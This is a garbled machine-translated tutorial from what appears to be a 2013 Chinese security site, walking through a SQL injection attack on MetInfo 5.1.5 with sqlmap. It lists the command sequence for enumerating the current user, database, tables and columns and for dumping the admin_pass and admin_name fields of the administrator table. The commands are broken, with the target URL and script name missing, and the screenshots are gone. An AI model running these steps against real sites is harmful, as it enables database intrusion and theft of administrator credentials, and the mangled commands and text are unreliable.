Use Sqlmap to test MetInfo enterprise website management system MySql injection vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201339711
Type myhack58
Reporter 佚名
Modified 2013-07-18T00:00:00


The last fork fork tell Sqlmap simple injection access database tutorial, this time we talk about the MySql database

MetInfo is a powerful enterprise web site management system, using PHP+Mysql architecture.

Fork fork download The is MetInfo 5.1.5 the free version, let's not pick, not analysis of the source code, The direct loss to the WVS inside sweep

! ScreenClip

Find the injection point, open our backtrack5,run Sqlmap artifact

! ScreenClip [2]

Get the current user name,enter the command:python -u –current-user


Get the current database name, enter the command:python -u –current-db

! ScreenClip [4]

Get the database name: met


The columns of the database table name, enter the command: python -u –tables-D “met“successfully”met”database table name as shown below:

! ScreenClip [6]

Column of the admin table field, enter the command: python -u –columns-T “met_admin_table“ -D “met”

! ScreenClip [7]

The figure above shows a successful acquisition met_admin_table table fields, the following dump shows the admin_name and admin_pass content, enter the command: python -u –dump-C “admin_pass,admin_name” -T “met_admin_table” -D “met”